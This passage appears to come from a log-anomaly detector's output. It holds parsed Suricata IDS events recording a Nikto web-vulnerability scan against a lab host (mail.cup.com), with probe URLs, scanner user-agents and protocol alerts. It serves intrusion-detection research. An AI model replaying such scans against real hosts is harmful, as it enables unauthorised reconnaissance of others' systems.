"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46792, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":279331771953661,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 279331771953661, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.178847+0000\",\"flow_id\":279331771953661,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46792,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsa\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsa\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80", "/parser/model/time": 1583349514.180234, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46794, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.180234 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46794 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.org", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.180404, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":1759467696471457,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46794, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1759467696471457,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1759467696471457, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": 
[ "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80", "/parser/model/time": 1583349514.181939, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46796, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dpgs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.182096, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46796, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1904689130685302, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80", "/parser/model/time": 1583349514.183734, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46798, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.showsource", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.184027, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2212887393913480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
